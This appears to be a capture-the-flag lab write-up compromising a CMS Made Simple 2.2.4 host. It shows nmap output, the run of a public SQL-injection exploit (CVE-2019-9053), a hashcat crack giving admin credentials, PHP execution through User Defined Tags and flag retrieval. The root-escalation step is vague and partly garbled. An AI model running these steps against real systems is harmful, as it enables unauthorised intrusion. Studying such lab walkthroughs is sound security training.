TL;DR
- We have found a CMSMadeSimple v2.2.4 instance
- Using https://www.exploit-db.com/exploits/46635 we have retrieved a user information
- We managed to crack that user information to found ourselves on the admin section
- Using the “user defined tags” we were able to run PHP and gain remote access as david
- Looking into /etc/passwd we have found a password for root
- Using hashcat we then crack the password to then escalate our access to root
NETWORK
sudo nmap -sCVS 172.31.1.2 -p22,80 --script=discovery
[sudo] password for clobee:
Sorry, try again.
[sudo] password for clobee:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:34 EST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for 172.31.1.2
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
| ssh2-enum-algos:
| kex_algorithms: (10)
| server_host_key_algorithms: (5)
| encryption_algorithms: (6)
| mac_algorithms: (10)
|_ compression_algorithms: (2)
| ssh-hostkey:
| 2048 9b:f9:a1:47:41:5f:d4:5c:97:33:55:26:ce:43:8f:2e (RSA)
| 256 40:68:53:3d:c0:3a:dc:ce:67:21:5b:68:33:68:04:83 (ECDSA)
|_ 256 12:13:a9:6f:66:ba:78:de:0a:9e:2f:ad:90:02:4e:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-headers:
| Date: Tue, 08 Mar 2022 00:34:26 GMT
| Server: Apache/2.4.29 (Ubuntu)
| Set-Cookie: CMSSESSIDfea4606480fb=gv1gf23pqmt9ac23d7fnmatkd4; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|
|_ (Request type: HEAD)
| http-vhosts:
|_128 names had status 200
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /admin/
| php: 1
| /tmp/cache/
| css: 2
| /uploads/simplex/js/
| js: 1
| /uploads/simplex/teaser/
| png: 2
| Longest directory structure:
| Depth: 3
| Dir: /uploads/simplex/js/
| Total files found (by extension):
|_ Other: 1; css: 2; js: 1; php: 2; png: 2
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.31.1.2
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| <!-- .news-article //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 78
| Comment:
| <!-- .content-inner (display content first) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 56
| Comment:
| <!-- .main-navigation (main navigation on the right side) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 100
| Comment:
| <!-- .sidebar //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 62
| Comment:
| <!-- .header-bottom (bottom part of header containing catchphrase and search field) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 87
| Comment:
| <!-- .content (actual content with title and content tags) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 105
| Comment:
| <!-- .content-wrapper //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| <!-- .news-summary //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 3
| Comment:
| <!--[if gt IE 8]><!-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 2
| Comment:
| <!--[if IE 8]> <html lang='en' dir='ltr' class='lt-ie9'> <![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 94
| Comment:
| <!-- .content-inner //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 80
| Comment:
| <!-- .content-top (breadcrumbs) -->
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 38
| Comment:
| <!--[if lte IE 6]>
| <style type="text/css">
| #pagewrapper {width:expression(P7_MinMaxW(720,1200));}
| #container {height: 1%;}
| </style>
| <![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 60
| Comment:
| <!-- .main-navigation //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| //--><!-- news pagination --></article><!-- .news-summary //-->
|
| Path: http://172.31.1.2:80/tmp/cache/stylesheet_combined_a3c396e29151f325531e4a155d0b9621.css
| Line number: 5
| Comment:
| /* cmsms stylesheet: Simplex Slideshow modified: 02/08/20 23:03:41 */
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 106
| Comment:
| <!-- .footer (footer area) -->
|
| Path: http://172.31.1.2:80/tmp/cache/stylesheet_combined_a3c396e29151f325531e4a155d0b9621.css
| Line number: 3
| Comment:
| /* cmsms stylesheet: Simplex Layout modified: 02/08/20 23:03:41 */
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 31
| Comment:
|
| //pass min and max - measured against window width
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 48
| Comment:
| <!-- .logo (cmsms logo on the left side) -->
|
| Path: http://172.31.1.2:80/tmp/cache/stylesheet_combined_74ba8462ce009c5d0349a77e5262eca0.css
| Line number: 1
| Comment:
| /* cmsms stylesheet: Simplex Print modified: 02/08/20 23:03:41 */
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 70
| Comment:
| <!-- .banner (banner area for a slider or teaser image) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 86
| Comment:
| <!-- .content-top //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| <!-- .news-article (wrapping each article) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 44
| Comment:
| //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 120
| Comment:
| <!-- #wrapper //-->
|
| Path: http://172.31.1.2:80/uploads/simplex/js/jquery.sequence-min.js
| Line number: 1
| Comment:
| /*
| Sequence.js (http://www.sequencejs.com)
| Version: 1.0.1.2
| Author: Ian Lunn @IanLunn
| Author URL: http://www.ianlunn.co.uk/
| Github: https://github.com/IanLunn/Sequence
|
| This is a FREE script and is available under a MIT License:
| http://www.opensource.org/licenses/mit-license.php
|
| Sequence.js and its dependencies are (c) Ian Lunn Design 2012 - 2013 unless otherwise stated.
|
| Sequence also relies on the following open source scripts:
|
| - jQuery imagesLoaded 2.1.0 (http://github.com/desandro/imagesloaded)
| Paul Irish et al
| Available under a MIT License: http://www.opensource.org/licenses/mit-license.php
|
| - jQuery TouchWipe 1.1.1 (http://www.netcu.de/jquery-touchwipe-iphone-ipad-library)
| Andreas Waltl, netCU Internetagentur (http://www.netcu.de)
| Available under a MIT License: http://www.opensource.org/licenses/mit-license.php
|
| - Modernizr 2.6.1 Custom Build (http://modernizr.com/) (Named Modernizr for Sequence to prevent conflicts)
| Copyright (c) Faruk Ates, Paul Irish, Alex Sexton
| Available under the BSD and MIT licenses: www.modernizr.com/license/
| */
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 72
| Comment:
| <!-- .banner //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 44
| Comment:
| <!-- accessibility //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 92
| Comment:
| <!-- .content //-->
|
| Path: http://172.31.1.2:80/admin/login.php
| Line number: 14
| Comment:
| <!--[if lt IE 9]>
| <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
| <![endif]-->
|
| Path: http://172.31.1.2:80/admin/login.php
| Line number: 13
| Comment:
| <!-- learn IE html5 -->
|
| Path: http://172.31.1.2:80/index.php?page=cssmenu_horizontal
| Line number: 46
| Comment:
| <!--[if lte IE 6]>
| <script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>
| <![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=cssmenu_horizontal
| Line number: 37
| Comment:
| <!--[if lte IE 6]>
| <style type="text/css">
| #pagewrapper {width:expression(P7_MinMaxW(720,950));}
| #container {height: 1%;}
| </style>
| <![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 95
| Comment:
| <!-- .sidebar (then show sidebar) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 74
| Comment:
| <!-- .top //-->
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 36
| Comment:
|
| //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 45
| Comment:
| <!-- .top (top section of page containing logo, navigation search...) -->
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 125
| Comment:
| <!-- Start News Display Template -->
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 30
| Comment:
| <!--
| //pass min and max - measured against window width
| function P7_MinMaxW(a,b){
| var nw="auto",w=document.documentElement.clientWidth;
| if(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;
| }
| //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 3
| Comment:
| <!--<![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=news
| Line number: 163
| Comment:
| <!-- End News Display Template -->
|
| Path: http://172.31.1.2:80/index.php?page=minimal-template
| Line number: 18
| Comment:
| <!-- cms_stylesheet error: No stylesheets matched the criteria specified -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| <!-- news pagination -->
|
| Path: http://172.31.1.2:80/tmp/cache/stylesheet_combined_a3c396e29151f325531e4a155d0b9621.css
| Line number: 1
| Comment:
| /* cmsms stylesheet: Simplex Core modified: 02/08/20 23:03:41 */
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 120
| Comment:
| //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 75
| Comment:
| <!-- .content-wrapper (wrapping div for content area) -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 32
| Comment:
| <!--[if lt IE 9]>
| <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
| <script src="//css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
| <![endif]-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 69
| Comment:
| <!-- .header-bottom //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 98
| Comment:
| <!-- .news-summary wrapper -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 39
| Comment:
| <!-- accessibility links, jump to nav or content -->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 55
| Comment:
| <!-- .logo //-->
|
| Path: http://172.31.1.2:80/index.php?page=welcome-to-simplex
| Line number: 37
| Comment:
|_ <!-- #wrapper (wrapping content in a box) -->
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
|_ http://css3-mediaqueries-js.googlecode.com:80/svn/trunk/css3-mediaqueries.js
|_http-mobileversion-checker: No mobile version detected.
|_http-feed: Couldn't find any feeds.
| http-enum:
| /admin/login.php: Possible admin folder
| /doc/: Potentially interesting folder
| /lib/: Potentially interesting folder
| /modules/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /tmp/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /uploads/: Potentially interesting folder
|_http-chrono: Request times for /; avg: 215.49ms; min: 189.44ms; max: 230.96ms
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=172.31.1.2
| Found the following error pages:
|
| Error Code: 400
| http://172.31.1.2:80
|
| Error Code: 404
|_ http://172.31.1.2:80/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=Simplex%20News%20Detail&cntnt01returnid=1
|_http-title: Home - Simple
|_http-xssed: No previously reported XSS vuln.
|_http-date: Tue, 08 Mar 2022 00:34:22 GMT; 0s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.31.1.2
| url method
|_ http://172.31.1.2:80/admin/login.php FORM
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ipidseq: ERROR: Script execution failed (use -d to debug)
| qscan:
| PORT FAMILY MEAN (us) STDDEV LOSS (%)
| 22 0 16550.00 3530.46 0.0%
|_80 0 16918.20 4332.26 0.0%
|_dns-brute: Can't guess domain of "172.31.1.2"; use dns-brute.domain script argument.
|_path-mtu: PMTU == 1500
|_fcrdns: FAIL (No PTR record)
ENUMERATION
The scan has revealed an application CMSMadeSimple located on the port 80
We ran some common scans which revealed the following information
whatweb http://$IP
http://172.31.1.2 [200 OK] Apache[2.4.29], CMS-Made-Simple[2.2.4], Cookies[CMSSESSIDfea4606480fb], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[172.31.1.2], JQuery[1.11.1], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.], Script[text/javascript], Title[Home - Simple]
Exploit
https://www.exploit-db.com/exploits/46635
CVE-2019-9053
Running this exploit we have found few interesting information
python 46635.py -u http://172.31.1.2
cat hash
bbeabbca0fff4e851f840ffad0680dcf:18207a2929431d9f
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt --show
bbeabbca0fff4e851f840ffad0680dcf:18207a2929431d9f:punisher
Using the founded credentials david/punisher we are in
Using the “User Defined Tags” on CMSMadeSimple, we can run PHP code on any pages
PRIV ESCALATION
Using this new credential rooot/AAAA we found ourselves into the root account
CAPTURE FLAGS
root@simple:/home/david# find / '(' -name 'access.txt' -or -name 'system.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null
33 /home/david/access.txt
dbe6218bdc74df7e7529dd4641629bb5
33 /root/system.txt
c20f32787812a86c23e91fd0a0c069a1